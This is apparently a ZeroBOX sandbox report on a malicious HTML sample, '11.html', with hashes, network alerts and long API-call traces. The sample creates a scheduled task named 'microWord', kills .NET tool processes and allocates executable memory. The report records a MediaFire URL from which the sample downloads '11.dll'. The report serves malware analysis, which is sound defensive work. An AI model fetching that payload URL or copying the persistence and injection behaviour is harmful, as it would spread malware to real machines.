popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

11.html

Generic Malware Antivirus AntiVM MSOffice File AntiDebug
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 May 19, 2022, 9:02 a.m. May 19, 2022, 9:05 a.m.
Size 3.8KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 f48bef3d2bb1295b3a5d1060815ff3e6
SHA256 197f636c1d4f9772cc838eda5b33e5e1d71f06df9c27acc1daf87feac8db3578
CRC32 018A5F5C
ssdeep 96:+PU0aTP8WUNMW718+OMaMFXM5M0GJMdzbgoiz4GWypH5IgkH:mxaY3oi/WItkH
Yara None matched

Name Response Post-Analysis Lookup
download2273.mediafire.com
A 199.91.155.14
199.91.155.14
www.mediafire.com
A 104.16.202.237
A 104.16.203.237
104.16.203.237
IP Address Status Action
104.16.203.237 Active Moloch
117.18.232.200 Active Moloch
164.124.101.2 Active Moloch
199.91.155.14 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49183 -> 199.91.155.14:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49182 -> 104.16.203.237:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49189 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 117.18.232.200:443 -> 192.168.56.102:49190 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.102:49184 -> 199.91.155.14:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49188 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49182
104.16.203.237:443 		C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Organization Validation Secure Server CA C=US, ST=Texas, O=MediaFire, OU=IT, CN=*.mediafire.com 49:b6:4e:74:94:f0:7e:32:2b:c5:39:18:d0:a5:1e:69:4d:65:8f:b6

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "microWord" has successfully been created.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

 buffer: ERROR: The process "aspnet_compiler.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "RegAsm.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "InstallUtil.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "cvtres.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "vbc.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "msbuild.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "csc.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "CasPol.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "jsc.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "RegAsm.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "RegSvcs.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "aspnet_regiis.exe" not found.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

 buffer: ERROR: The process "aspnet_regbrowsers.exe" not found.
console_handle: 0x000000000000000b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000000019e800
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001ac130
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001ac130
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001ac130
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd0f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd0f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd0f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd0f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd470
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd470
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd470
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd940
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd940
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd940
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdb70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdb70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bdb00
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bde80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bde80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001abb10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001abb10
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9df7f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9df7f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001ba64af0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001ba64af0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd6a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd6a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd9b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000001bd9b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefdcfa49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7feff2373c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff6d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7feff255295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7feff252799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7feff2faf1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7feff2fb76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7feff2548d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff800883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff800ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff800c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7feff6ba4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7feff6cd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7feff80347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7feff80122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7feff803542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7feff6cd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7feff6cd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77569bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x775698da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7feff6cd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7feff7f3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7feff6a0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7feff6a0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x772e652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x7767c521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefdcfa49d
registers.r14: 0
registers.r15: 0
registers.rcx: 99410128
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 99416080
registers.r11: 99411888
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1922348528
registers.r13: 0
1 0 0
suspicious_features GET method with no useragent header suspicious_request GET https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request GET https://www.mediafire.com/file/cqbvjh2mo0z6x96/11.dll/file
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 9703424
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000025f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002f30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007756d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077574000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe0c4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff4a1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755a000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002b70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa7c7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef7019000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3d89000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2312
region_size: 9834496
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002f60000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2312
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000038c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000775c1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007756d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077574000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077592000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc5c5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe0c4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff4a1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755b000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772e6000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077696000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772e1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077560000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007755a000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007766f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007767b000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff7e7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2312
stack_dep_bypass: 0
stack_pivoted: 0
